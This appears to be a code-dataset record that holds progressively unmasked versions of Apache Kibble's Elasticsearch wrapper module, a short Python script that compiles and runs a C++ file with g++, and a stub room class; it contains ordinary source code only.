self._grupo_items.sacar(item)\n\n # def contiene_item(self, item):\n # return self._grupo_items.contiene(item)\n\n # def tiene_items(self):\n # return self._grupo_items.esta_vacio()\n\nlocalidad_nula = Localidad('NULA', 'Localidad nula.')\n",
"step-ids": [
20,
22,
25,
26,
27
]
}
|
[
20,
22,
25,
26,
27
] |
<|reserved_special_token_0|>
class KibbleESWrapper(object):
<|reserved_special_token_0|>
def __init__(self, ES):
self.ES = ES
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def scroll(self, scroll_id, scroll):
return self.ES.scroll(scroll_id=scroll_id, scroll=scroll)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class KibbleESWrapperSeven(object):
"""
Class for rewriting old-style queries to the >= 7.x ones,
where doc_type is an integral part of the DB name and NO DOC_TYPE!
"""
def __init__(self, ES):
self.ES = ES
def get(self, index, doc_type, id):
return self.ES.get(index=index + '_' + doc_type, id=id)
def exists(self, index, doc_type, id):
return self.ES.exists(index=index + '_' + doc_type, id=id)
def delete(self, index, doc_type, id):
return self.ES.delete(index=index + '_' + doc_type, id=id)
def index(self, index, doc_type, id, body):
return self.ES.index(index=index + '_' + doc_type, id=id, body=body)
def update(self, index, doc_type, id, body):
return self.ES.update(index=index + '_' + doc_type, id=id, body=body)
def scroll(self, scroll_id, scroll):
return self.ES.scroll(scroll_id=scroll_id, scroll=scroll)
def delete_by_query(self, **kwargs):
return self.ES.delete_by_query(**kwargs)
def search(self, index, doc_type, size=100, scroll=None,
_source_include=None, body=None):
return self.ES.search(index=index + '_' + doc_type, size=size,
scroll=scroll, _source_includes=_source_include, body=body)
def count(self, index, doc_type='*', body=None):
return self.ES.count(index=index + '_' + doc_type, body=body)
class KibbleDatabase(object):
def __init__(self, config: KibbleConfigParser):
self.config = config
self.dbname = config.get('elasticsearch', 'dbname')
self.ES = elasticsearch.Elasticsearch([config.get('elasticsearch',
'conn_uri')], use_ssl=config.getboolean('elasticsearch', 'ssl'),
verify_certs=False, max_retries=5, retry_on_timeout=True)
self.ESversion = int(self.ES.info()['version']['number'].split('.')[0])
if self.ESversion >= 7:
self.ES = KibbleESWrapperSeven(self.ES)
elif self.ESversion >= 6:
self.ES = KibbleESWrapper(self.ES)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class KibbleESWrapper(object):
<|reserved_special_token_0|>
def __init__(self, ES):
self.ES = ES
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def index(self, index, doc_type, id, body):
return self.ES.index(index=index + '_' + doc_type, doc_type='_doc',
id=id, body=body)
<|reserved_special_token_0|>
def scroll(self, scroll_id, scroll):
return self.ES.scroll(scroll_id=scroll_id, scroll=scroll)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def count(self, index, doc_type='*', body=None):
return self.ES.count(index=index + '_' + doc_type, doc_type='_doc',
body=body)
class KibbleESWrapperSeven(object):
"""
Class for rewriting old-style queries to the >= 7.x ones,
where doc_type is an integral part of the DB name and NO DOC_TYPE!
"""
def __init__(self, ES):
self.ES = ES
def get(self, index, doc_type, id):
return self.ES.get(index=index + '_' + doc_type, id=id)
def exists(self, index, doc_type, id):
return self.ES.exists(index=index + '_' + doc_type, id=id)
def delete(self, index, doc_type, id):
return self.ES.delete(index=index + '_' + doc_type, id=id)
def index(self, index, doc_type, id, body):
return self.ES.index(index=index + '_' + doc_type, id=id, body=body)
def update(self, index, doc_type, id, body):
return self.ES.update(index=index + '_' + doc_type, id=id, body=body)
def scroll(self, scroll_id, scroll):
return self.ES.scroll(scroll_id=scroll_id, scroll=scroll)
def delete_by_query(self, **kwargs):
return self.ES.delete_by_query(**kwargs)
def search(self, index, doc_type, size=100, scroll=None,
_source_include=None, body=None):
return self.ES.search(index=index + '_' + doc_type, size=size,
scroll=scroll, _source_includes=_source_include, body=body)
def count(self, index, doc_type='*', body=None):
return self.ES.count(index=index + '_' + doc_type, body=body)
class KibbleDatabase(object):
def __init__(self, config: KibbleConfigParser):
self.config = config
self.dbname = config.get('elasticsearch', 'dbname')
self.ES = elasticsearch.Elasticsearch([config.get('elasticsearch',
'conn_uri')], use_ssl=config.getboolean('elasticsearch', 'ssl'),
verify_certs=False, max_retries=5, retry_on_timeout=True)
self.ESversion = int(self.ES.info()['version']['number'].split('.')[0])
if self.ESversion >= 7:
self.ES = KibbleESWrapperSeven(self.ES)
elif self.ESversion >= 6:
self.ES = KibbleESWrapper(self.ES)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class KibbleESWrapper(object):
<|reserved_special_token_0|>
def __init__(self, ES):
self.ES = ES
def get(self, index, doc_type, id):
return self.ES.get(index=index + '_' + doc_type, doc_type='_doc', id=id
)
def exists(self, index, doc_type, id):
return self.ES.exists(index=index + '_' + doc_type, doc_type='_doc',
id=id)
<|reserved_special_token_0|>
def index(self, index, doc_type, id, body):
return self.ES.index(index=index + '_' + doc_type, doc_type='_doc',
id=id, body=body)
def update(self, index, doc_type, id, body):
return self.ES.update(index=index + '_' + doc_type, doc_type='_doc',
id=id, body=body)
def scroll(self, scroll_id, scroll):
return self.ES.scroll(scroll_id=scroll_id, scroll=scroll)
<|reserved_special_token_0|>
def search(self, index, doc_type, size=100, scroll=None,
_source_include=None, body=None):
return self.ES.search(index=index + '_' + doc_type, doc_type='_doc',
size=size, scroll=scroll, _source_include=_source_include, body
=body)
def count(self, index, doc_type='*', body=None):
return self.ES.count(index=index + '_' + doc_type, doc_type='_doc',
body=body)
class KibbleESWrapperSeven(object):
"""
Class for rewriting old-style queries to the >= 7.x ones,
where doc_type is an integral part of the DB name and NO DOC_TYPE!
"""
def __init__(self, ES):
self.ES = ES
def get(self, index, doc_type, id):
return self.ES.get(index=index + '_' + doc_type, id=id)
def exists(self, index, doc_type, id):
return self.ES.exists(index=index + '_' + doc_type, id=id)
def delete(self, index, doc_type, id):
return self.ES.delete(index=index + '_' + doc_type, id=id)
def index(self, index, doc_type, id, body):
return self.ES.index(index=index + '_' + doc_type, id=id, body=body)
def update(self, index, doc_type, id, body):
return self.ES.update(index=index + '_' + doc_type, id=id, body=body)
def scroll(self, scroll_id, scroll):
return self.ES.scroll(scroll_id=scroll_id, scroll=scroll)
def delete_by_query(self, **kwargs):
return self.ES.delete_by_query(**kwargs)
def search(self, index, doc_type, size=100, scroll=None,
_source_include=None, body=None):
return self.ES.search(index=index + '_' + doc_type, size=size,
scroll=scroll, _source_includes=_source_include, body=body)
def count(self, index, doc_type='*', body=None):
return self.ES.count(index=index + '_' + doc_type, body=body)
class KibbleDatabase(object):
def __init__(self, config: KibbleConfigParser):
self.config = config
self.dbname = config.get('elasticsearch', 'dbname')
self.ES = elasticsearch.Elasticsearch([config.get('elasticsearch',
'conn_uri')], use_ssl=config.getboolean('elasticsearch', 'ssl'),
verify_certs=False, max_retries=5, retry_on_timeout=True)
self.ESversion = int(self.ES.info()['version']['number'].split('.')[0])
if self.ESversion >= 7:
self.ES = KibbleESWrapperSeven(self.ES)
elif self.ESversion >= 6:
self.ES = KibbleESWrapper(self.ES)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class KibbleESWrapper(object):
<|reserved_special_token_0|>
def __init__(self, ES):
self.ES = ES
def get(self, index, doc_type, id):
return self.ES.get(index=index + '_' + doc_type, doc_type='_doc', id=id
)
def exists(self, index, doc_type, id):
return self.ES.exists(index=index + '_' + doc_type, doc_type='_doc',
id=id)
def delete(self, index, doc_type, id):
return self.ES.delete(index=index + '_' + doc_type, doc_type='_doc',
id=id)
def index(self, index, doc_type, id, body):
return self.ES.index(index=index + '_' + doc_type, doc_type='_doc',
id=id, body=body)
def update(self, index, doc_type, id, body):
return self.ES.update(index=index + '_' + doc_type, doc_type='_doc',
id=id, body=body)
def scroll(self, scroll_id, scroll):
return self.ES.scroll(scroll_id=scroll_id, scroll=scroll)
def delete_by_query(self, **kwargs):
return self.ES.delete_by_query(**kwargs)
def search(self, index, doc_type, size=100, scroll=None,
_source_include=None, body=None):
return self.ES.search(index=index + '_' + doc_type, doc_type='_doc',
size=size, scroll=scroll, _source_include=_source_include, body
=body)
def count(self, index, doc_type='*', body=None):
return self.ES.count(index=index + '_' + doc_type, doc_type='_doc',
body=body)
class KibbleESWrapperSeven(object):
"""
Class for rewriting old-style queries to the >= 7.x ones,
where doc_type is an integral part of the DB name and NO DOC_TYPE!
"""
def __init__(self, ES):
self.ES = ES
def get(self, index, doc_type, id):
return self.ES.get(index=index + '_' + doc_type, id=id)
def exists(self, index, doc_type, id):
return self.ES.exists(index=index + '_' + doc_type, id=id)
def delete(self, index, doc_type, id):
return self.ES.delete(index=index + '_' + doc_type, id=id)
def index(self, index, doc_type, id, body):
return self.ES.index(index=index + '_' + doc_type, id=id, body=body)
def update(self, index, doc_type, id, body):
return self.ES.update(index=index + '_' + doc_type, id=id, body=body)
def scroll(self, scroll_id, scroll):
return self.ES.scroll(scroll_id=scroll_id, scroll=scroll)
def delete_by_query(self, **kwargs):
return self.ES.delete_by_query(**kwargs)
def search(self, index, doc_type, size=100, scroll=None,
_source_include=None, body=None):
return self.ES.search(index=index + '_' + doc_type, size=size,
scroll=scroll, _source_includes=_source_include, body=body)
def count(self, index, doc_type='*', body=None):
return self.ES.count(index=index + '_' + doc_type, body=body)
class KibbleDatabase(object):
def __init__(self, config: KibbleConfigParser):
self.config = config
self.dbname = config.get('elasticsearch', 'dbname')
self.ES = elasticsearch.Elasticsearch([config.get('elasticsearch',
'conn_uri')], use_ssl=config.getboolean('elasticsearch', 'ssl'),
verify_certs=False, max_retries=5, retry_on_timeout=True)
self.ESversion = int(self.ES.info()['version']['number'].split('.')[0])
if self.ESversion >= 7:
self.ES = KibbleESWrapperSeven(self.ES)
elif self.ESversion >= 6:
self.ES = KibbleESWrapper(self.ES)
<|reserved_special_token_1|>
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
This is the ES library for Apache Kibble.
It stores the elasticsearch handler and config options.
"""
import elasticsearch
from kibble.configuration import KibbleConfigParser
class KibbleESWrapper(object):
"""
Class for rewriting old-style queries to the new ones,
where doc_type is an integral part of the DB name
"""
def __init__(self, ES):
self.ES = ES
def get(self, index, doc_type, id):
return self.ES.get(index=index + "_" + doc_type, doc_type="_doc", id=id)
def exists(self, index, doc_type, id):
return self.ES.exists(index=index + "_" + doc_type, doc_type="_doc", id=id)
def delete(self, index, doc_type, id):
return self.ES.delete(index=index + "_" + doc_type, doc_type="_doc", id=id)
def index(self, index, doc_type, id, body):
return self.ES.index(
index=index + "_" + doc_type, doc_type="_doc", id=id, body=body
)
def update(self, index, doc_type, id, body):
return self.ES.update(
index=index + "_" + doc_type, doc_type="_doc", id=id, body=body
)
def scroll(self, scroll_id, scroll):
return self.ES.scroll(scroll_id=scroll_id, scroll=scroll)
def delete_by_query(self, **kwargs):
return self.ES.delete_by_query(**kwargs)
def search(
self, index, doc_type, size=100, scroll=None, _source_include=None, body=None
):
return self.ES.search(
index=index + "_" + doc_type,
doc_type="_doc",
size=size,
scroll=scroll,
_source_include=_source_include,
body=body,
)
def count(self, index, doc_type="*", body=None):
return self.ES.count(index=index + "_" + doc_type, doc_type="_doc", body=body)
class KibbleESWrapperSeven(object):
"""
Class for rewriting old-style queries to the >= 7.x ones,
where doc_type is an integral part of the DB name and NO DOC_TYPE!
"""
def __init__(self, ES):
self.ES = ES
def get(self, index, doc_type, id):
return self.ES.get(index=index + "_" + doc_type, id=id)
def exists(self, index, doc_type, id):
return self.ES.exists(index=index + "_" + doc_type, id=id)
def delete(self, index, doc_type, id):
return self.ES.delete(index=index + "_" + doc_type, id=id)
def index(self, index, doc_type, id, body):
return self.ES.index(index=index + "_" + doc_type, id=id, body=body)
def update(self, index, doc_type, id, body):
return self.ES.update(index=index + "_" + doc_type, id=id, body=body)
def scroll(self, scroll_id, scroll):
return self.ES.scroll(scroll_id=scroll_id, scroll=scroll)
def delete_by_query(self, **kwargs):
return self.ES.delete_by_query(**kwargs)
def search(
self, index, doc_type, size=100, scroll=None, _source_include=None, body=None
):
return self.ES.search(
index=index + "_" + doc_type,
size=size,
scroll=scroll,
_source_includes=_source_include,
body=body,
)
def count(self, index, doc_type="*", body=None):
return self.ES.count(index=index + "_" + doc_type, body=body)
class KibbleDatabase(object):
def __init__(self, config: KibbleConfigParser):
self.config = config
self.dbname = config.get("elasticsearch", "dbname")
self.ES = elasticsearch.Elasticsearch(
[config.get("elasticsearch", "conn_uri")],
use_ssl=config.getboolean("elasticsearch", "ssl"),
verify_certs=False,
max_retries=5,
retry_on_timeout=True,
)
# IMPORTANT BIT: Figure out if this is ES < 6.x, 6.x or >= 7.x.
# If so, we're using the new ES DB mappings, and need to adjust ALL
# ES calls to match this.
self.ESversion = int(self.ES.info()["version"]["number"].split(".")[0])
if self.ESversion >= 7:
self.ES = KibbleESWrapperSeven(self.ES)
elif self.ESversion >= 6:
self.ES = KibbleESWrapper(self.ES)
|
flexible
|
{
"blob_id": "f4b704a1416bfd6524340a68a20981957abf4340",
"index": 9850,
"step-1": "<mask token>\n\n\nclass KibbleESWrapper(object):\n <mask token>\n\n def __init__(self, ES):\n self.ES = ES\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def scroll(self, scroll_id, scroll):\n return self.ES.scroll(scroll_id=scroll_id, scroll=scroll)\n <mask token>\n <mask token>\n <mask token>\n\n\nclass KibbleESWrapperSeven(object):\n \"\"\"\n Class for rewriting old-style queries to the >= 7.x ones,\n where doc_type is an integral part of the DB name and NO DOC_TYPE!\n \"\"\"\n\n def __init__(self, ES):\n self.ES = ES\n\n def get(self, index, doc_type, id):\n return self.ES.get(index=index + '_' + doc_type, id=id)\n\n def exists(self, index, doc_type, id):\n return self.ES.exists(index=index + '_' + doc_type, id=id)\n\n def delete(self, index, doc_type, id):\n return self.ES.delete(index=index + '_' + doc_type, id=id)\n\n def index(self, index, doc_type, id, body):\n return self.ES.index(index=index + '_' + doc_type, id=id, body=body)\n\n def update(self, index, doc_type, id, body):\n return self.ES.update(index=index + '_' + doc_type, id=id, body=body)\n\n def scroll(self, scroll_id, scroll):\n return self.ES.scroll(scroll_id=scroll_id, scroll=scroll)\n\n def delete_by_query(self, **kwargs):\n return self.ES.delete_by_query(**kwargs)\n\n def search(self, index, doc_type, size=100, scroll=None,\n _source_include=None, body=None):\n return self.ES.search(index=index + '_' + doc_type, size=size,\n scroll=scroll, _source_includes=_source_include, body=body)\n\n def count(self, index, doc_type='*', body=None):\n return self.ES.count(index=index + '_' + doc_type, body=body)\n\n\nclass KibbleDatabase(object):\n\n def __init__(self, config: KibbleConfigParser):\n self.config = config\n self.dbname = config.get('elasticsearch', 'dbname')\n self.ES = elasticsearch.Elasticsearch([config.get('elasticsearch',\n 'conn_uri')], use_ssl=config.getboolean('elasticsearch', 'ssl'),\n verify_certs=False, max_retries=5, retry_on_timeout=True)\n self.ESversion = int(self.ES.info()['version']['number'].split('.')[0])\n if self.ESversion >= 7:\n self.ES = KibbleESWrapperSeven(self.ES)\n elif self.ESversion >= 6:\n self.ES = KibbleESWrapper(self.ES)\n",
"step-2": "<mask token>\n\n\nclass KibbleESWrapper(object):\n <mask token>\n\n def __init__(self, ES):\n self.ES = ES\n <mask token>\n <mask token>\n <mask token>\n\n def index(self, index, doc_type, id, body):\n return self.ES.index(index=index + '_' + doc_type, doc_type='_doc',\n id=id, body=body)\n <mask token>\n\n def scroll(self, scroll_id, scroll):\n return self.ES.scroll(scroll_id=scroll_id, scroll=scroll)\n <mask token>\n <mask token>\n\n def count(self, index, doc_type='*', body=None):\n return self.ES.count(index=index + '_' + doc_type, doc_type='_doc',\n body=body)\n\n\nclass KibbleESWrapperSeven(object):\n \"\"\"\n Class for rewriting old-style queries to the >= 7.x ones,\n where doc_type is an integral part of the DB name and NO DOC_TYPE!\n \"\"\"\n\n def __init__(self, ES):\n self.ES = ES\n\n def get(self, index, doc_type, id):\n return self.ES.get(index=index + '_' + doc_type, id=id)\n\n def exists(self, index, doc_type, id):\n return self.ES.exists(index=index + '_' + doc_type, id=id)\n\n def delete(self, index, doc_type, id):\n return self.ES.delete(index=index + '_' + doc_type, id=id)\n\n def index(self, index, doc_type, id, body):\n return self.ES.index(index=index + '_' + doc_type, id=id, body=body)\n\n def update(self, index, doc_type, id, body):\n return self.ES.update(index=index + '_' + doc_type, id=id, body=body)\n\n def scroll(self, scroll_id, scroll):\n return self.ES.scroll(scroll_id=scroll_id, scroll=scroll)\n\n def delete_by_query(self, **kwargs):\n return self.ES.delete_by_query(**kwargs)\n\n def search(self, index, doc_type, size=100, scroll=None,\n _source_include=None, body=None):\n return self.ES.search(index=index + '_' + doc_type, size=size,\n scroll=scroll, _source_includes=_source_include, body=body)\n\n def count(self, index, doc_type='*', body=None):\n return self.ES.count(index=index + '_' + doc_type, body=body)\n\n\nclass KibbleDatabase(object):\n\n def __init__(self, config: KibbleConfigParser):\n self.config = config\n self.dbname = config.get('elasticsearch', 'dbname')\n self.ES = elasticsearch.Elasticsearch([config.get('elasticsearch',\n 'conn_uri')], use_ssl=config.getboolean('elasticsearch', 'ssl'),\n verify_certs=False, max_retries=5, retry_on_timeout=True)\n self.ESversion = int(self.ES.info()['version']['number'].split('.')[0])\n if self.ESversion >= 7:\n self.ES = KibbleESWrapperSeven(self.ES)\n elif self.ESversion >= 6:\n self.ES = KibbleESWrapper(self.ES)\n",
"step-3": "<mask token>\n\n\nclass KibbleESWrapper(object):\n <mask token>\n\n def __init__(self, ES):\n self.ES = ES\n\n def get(self, index, doc_type, id):\n return self.ES.get(index=index + '_' + doc_type, doc_type='_doc', id=id\n )\n\n def exists(self, index, doc_type, id):\n return self.ES.exists(index=index + '_' + doc_type, doc_type='_doc',\n id=id)\n <mask token>\n\n def index(self, index, doc_type, id, body):\n return self.ES.index(index=index + '_' + doc_type, doc_type='_doc',\n id=id, body=body)\n\n def update(self, index, doc_type, id, body):\n return self.ES.update(index=index + '_' + doc_type, doc_type='_doc',\n id=id, body=body)\n\n def scroll(self, scroll_id, scroll):\n return self.ES.scroll(scroll_id=scroll_id, scroll=scroll)\n <mask token>\n\n def search(self, index, doc_type, size=100, scroll=None,\n _source_include=None, body=None):\n return self.ES.search(index=index + '_' + doc_type, doc_type='_doc',\n size=size, scroll=scroll, _source_include=_source_include, body\n =body)\n\n def count(self, index, doc_type='*', body=None):\n return self.ES.count(index=index + '_' + doc_type, doc_type='_doc',\n body=body)\n\n\nclass KibbleESWrapperSeven(object):\n \"\"\"\n Class for rewriting old-style queries to the >= 7.x ones,\n where doc_type is an integral part of the DB name and NO DOC_TYPE!\n \"\"\"\n\n def __init__(self, ES):\n self.ES = ES\n\n def get(self, index, doc_type, id):\n return self.ES.get(index=index + '_' + doc_type, id=id)\n\n def exists(self, index, doc_type, id):\n return self.ES.exists(index=index + '_' + doc_type, id=id)\n\n def delete(self, index, doc_type, id):\n return self.ES.delete(index=index + '_' + doc_type, id=id)\n\n def index(self, index, doc_type, id, body):\n return self.ES.index(index=index + '_' + doc_type, id=id, body=body)\n\n def update(self, index, doc_type, id, body):\n return self.ES.update(index=index + '_' + doc_type, id=id, body=body)\n\n def scroll(self, scroll_id, scroll):\n return self.ES.scroll(scroll_id=scroll_id, scroll=scroll)\n\n def delete_by_query(self, **kwargs):\n return self.ES.delete_by_query(**kwargs)\n\n def search(self, index, doc_type, size=100, scroll=None,\n _source_include=None, body=None):\n return self.ES.search(index=index + '_' + doc_type, size=size,\n scroll=scroll, _source_includes=_source_include, body=body)\n\n def count(self, index, doc_type='*', body=None):\n return self.ES.count(index=index + '_' + doc_type, body=body)\n\n\nclass KibbleDatabase(object):\n\n def __init__(self, config: KibbleConfigParser):\n self.config = config\n self.dbname = config.get('elasticsearch', 'dbname')\n self.ES = elasticsearch.Elasticsearch([config.get('elasticsearch',\n 'conn_uri')], use_ssl=config.getboolean('elasticsearch', 'ssl'),\n verify_certs=False, max_retries=5, retry_on_timeout=True)\n self.ESversion = int(self.ES.info()['version']['number'].split('.')[0])\n if self.ESversion >= 7:\n self.ES = KibbleESWrapperSeven(self.ES)\n elif self.ESversion >= 6:\n self.ES = KibbleESWrapper(self.ES)\n",
"step-4": "<mask token>\n\n\nclass KibbleESWrapper(object):\n <mask token>\n\n def __init__(self, ES):\n self.ES = ES\n\n def get(self, index, doc_type, id):\n return self.ES.get(index=index + '_' + doc_type, doc_type='_doc', id=id\n )\n\n def exists(self, index, doc_type, id):\n return self.ES.exists(index=index + '_' + doc_type, doc_type='_doc',\n id=id)\n\n def delete(self, index, doc_type, id):\n return self.ES.delete(index=index + '_' + doc_type, doc_type='_doc',\n id=id)\n\n def index(self, index, doc_type, id, body):\n return self.ES.index(index=index + '_' + doc_type, doc_type='_doc',\n id=id, body=body)\n\n def update(self, index, doc_type, id, body):\n return self.ES.update(index=index + '_' + doc_type, doc_type='_doc',\n id=id, body=body)\n\n def scroll(self, scroll_id, scroll):\n return self.ES.scroll(scroll_id=scroll_id, scroll=scroll)\n\n def delete_by_query(self, **kwargs):\n return self.ES.delete_by_query(**kwargs)\n\n def search(self, index, doc_type, size=100, scroll=None,\n _source_include=None, body=None):\n return self.ES.search(index=index + '_' + doc_type, doc_type='_doc',\n size=size, scroll=scroll, _source_include=_source_include, body\n =body)\n\n def count(self, index, doc_type='*', body=None):\n return self.ES.count(index=index + '_' + doc_type, doc_type='_doc',\n body=body)\n\n\nclass KibbleESWrapperSeven(object):\n \"\"\"\n Class for rewriting old-style queries to the >= 7.x ones,\n where doc_type is an integral part of the DB name and NO DOC_TYPE!\n \"\"\"\n\n def __init__(self, ES):\n self.ES = ES\n\n def get(self, index, doc_type, id):\n return self.ES.get(index=index + '_' + doc_type, id=id)\n\n def exists(self, index, doc_type, id):\n return self.ES.exists(index=index + '_' + doc_type, id=id)\n\n def delete(self, index, doc_type, id):\n return self.ES.delete(index=index + '_' + doc_type, id=id)\n\n def index(self, index, doc_type, id, body):\n return self.ES.index(index=index + '_' + doc_type, id=id, body=body)\n\n def update(self, index, doc_type, id, body):\n return self.ES.update(index=index + '_' + doc_type, id=id, body=body)\n\n def scroll(self, scroll_id, scroll):\n return self.ES.scroll(scroll_id=scroll_id, scroll=scroll)\n\n def delete_by_query(self, **kwargs):\n return self.ES.delete_by_query(**kwargs)\n\n def search(self, index, doc_type, size=100, scroll=None,\n _source_include=None, body=None):\n return self.ES.search(index=index + '_' + doc_type, size=size,\n scroll=scroll, _source_includes=_source_include, body=body)\n\n def count(self, index, doc_type='*', body=None):\n return self.ES.count(index=index + '_' + doc_type, body=body)\n\n\nclass KibbleDatabase(object):\n\n def __init__(self, config: KibbleConfigParser):\n self.config = config\n self.dbname = config.get('elasticsearch', 'dbname')\n self.ES = elasticsearch.Elasticsearch([config.get('elasticsearch',\n 'conn_uri')], use_ssl=config.getboolean('elasticsearch', 'ssl'),\n verify_certs=False, max_retries=5, retry_on_timeout=True)\n self.ESversion = int(self.ES.info()['version']['number'].split('.')[0])\n if self.ESversion >= 7:\n self.ES = KibbleESWrapperSeven(self.ES)\n elif self.ESversion >= 6:\n self.ES = KibbleESWrapper(self.ES)\n",
"step-5": "# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n\n\"\"\"\nThis is the ES library for Apache Kibble.\nIt stores the elasticsearch handler and config options.\n\"\"\"\n\nimport elasticsearch\n\nfrom kibble.configuration import KibbleConfigParser\n\n\nclass KibbleESWrapper(object):\n \"\"\"\n Class for rewriting old-style queries to the new ones,\n where doc_type is an integral part of the DB name\n \"\"\"\n\n def __init__(self, ES):\n self.ES = ES\n\n def get(self, index, doc_type, id):\n return self.ES.get(index=index + \"_\" + doc_type, doc_type=\"_doc\", id=id)\n\n def exists(self, index, doc_type, id):\n return self.ES.exists(index=index + \"_\" + doc_type, doc_type=\"_doc\", id=id)\n\n def delete(self, index, doc_type, id):\n return self.ES.delete(index=index + \"_\" + doc_type, doc_type=\"_doc\", id=id)\n\n def index(self, index, doc_type, id, body):\n return self.ES.index(\n index=index + \"_\" + doc_type, doc_type=\"_doc\", id=id, body=body\n )\n\n def update(self, index, doc_type, id, body):\n return self.ES.update(\n index=index + \"_\" + doc_type, doc_type=\"_doc\", id=id, body=body\n )\n\n def scroll(self, scroll_id, scroll):\n return self.ES.scroll(scroll_id=scroll_id, scroll=scroll)\n\n def delete_by_query(self, **kwargs):\n return self.ES.delete_by_query(**kwargs)\n\n def search(\n self, index, doc_type, size=100, scroll=None, _source_include=None, body=None\n ):\n return self.ES.search(\n index=index + \"_\" + doc_type,\n doc_type=\"_doc\",\n size=size,\n scroll=scroll,\n _source_include=_source_include,\n body=body,\n )\n\n def count(self, index, doc_type=\"*\", body=None):\n return self.ES.count(index=index + \"_\" + doc_type, doc_type=\"_doc\", body=body)\n\n\nclass KibbleESWrapperSeven(object):\n \"\"\"\n Class for rewriting old-style queries to the >= 7.x ones,\n where doc_type is an integral part of the DB name and NO DOC_TYPE!\n \"\"\"\n\n def __init__(self, ES):\n self.ES = ES\n\n def get(self, index, doc_type, id):\n return self.ES.get(index=index + \"_\" + doc_type, id=id)\n\n def exists(self, index, doc_type, id):\n return self.ES.exists(index=index + \"_\" + doc_type, id=id)\n\n def delete(self, index, doc_type, id):\n return self.ES.delete(index=index + \"_\" + doc_type, id=id)\n\n def index(self, index, doc_type, id, body):\n return self.ES.index(index=index + \"_\" + doc_type, id=id, body=body)\n\n def update(self, index, doc_type, id, body):\n return self.ES.update(index=index + \"_\" + doc_type, id=id, body=body)\n\n def scroll(self, scroll_id, scroll):\n return self.ES.scroll(scroll_id=scroll_id, scroll=scroll)\n\n def delete_by_query(self, **kwargs):\n return self.ES.delete_by_query(**kwargs)\n\n def search(\n self, index, doc_type, size=100, scroll=None, _source_include=None, body=None\n ):\n return 
self.ES.search(\n index=index + \"_\" + doc_type,\n size=size,\n scroll=scroll,\n _source_includes=_source_include,\n body=body,\n )\n\n def count(self, index, doc_type=\"*\", body=None):\n return self.ES.count(index=index + \"_\" + doc_type, body=body)\n\n\nclass KibbleDatabase(object):\n def __init__(self, config: KibbleConfigParser):\n self.config = config\n self.dbname = config.get(\"elasticsearch\", \"dbname\")\n self.ES = elasticsearch.Elasticsearch(\n [config.get(\"elasticsearch\", \"conn_uri\")],\n use_ssl=config.getboolean(\"elasticsearch\", \"ssl\"),\n verify_certs=False,\n max_retries=5,\n retry_on_timeout=True,\n )\n\n # IMPORTANT BIT: Figure out if this is ES < 6.x, 6.x or >= 7.x.\n # If so, we're using the new ES DB mappings, and need to adjust ALL\n # ES calls to match this.\n self.ESversion = int(self.ES.info()[\"version\"][\"number\"].split(\".\")[0])\n if self.ESversion >= 7:\n self.ES = KibbleESWrapperSeven(self.ES)\n elif self.ESversion >= 6:\n self.ES = KibbleESWrapper(self.ES)\n",
"step-ids": [
17,
19,
23,
25,
28
]
}
|
[
17,
19,
23,
25,
28
] |
#!/usr/bin/python3
import os
import sys
import subprocess
path = sys.argv[1]
name, ext = os.path.splitext(path)
options = ['g++',
'-O3',
'src/' + path,
'-o', f'./bin/{name}',
'-std=c++11',
'-lgmp']
subprocess.call(options)
subprocess.call([f'./bin/{name}'])
|
normal
|
{
"blob_id": "5dd79f8ebd74099871d4367cafd83359c4f24e26",
"index": 5385,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nsubprocess.call(options)\nsubprocess.call([f'./bin/{name}'])\n",
"step-3": "<mask token>\npath = sys.argv[1]\nname, ext = os.path.splitext(path)\noptions = ['g++', '-O3', 'src/' + path, '-o', f'./bin/{name}', '-std=c++11',\n '-lgmp']\nsubprocess.call(options)\nsubprocess.call([f'./bin/{name}'])\n",
"step-4": "import os\nimport sys\nimport subprocess\npath = sys.argv[1]\nname, ext = os.path.splitext(path)\noptions = ['g++', '-O3', 'src/' + path, '-o', f'./bin/{name}', '-std=c++11',\n '-lgmp']\nsubprocess.call(options)\nsubprocess.call([f'./bin/{name}'])\n",
"step-5": "#!/usr/bin/python3\n\nimport os\nimport sys\nimport subprocess\n\npath = sys.argv[1]\nname, ext = os.path.splitext(path)\noptions = ['g++',\n '-O3',\n 'src/' + path,\n '-o', f'./bin/{name}',\n '-std=c++11',\n '-lgmp']\nsubprocess.call(options)\nsubprocess.call([f'./bin/{name}'])\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Office(Room):
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Office(Room):
def __init__(self):
pass
<|reserved_special_token_1|>
from room import Room
class Office(Room):
def __init__(self):
pass
|
flexible
|
{
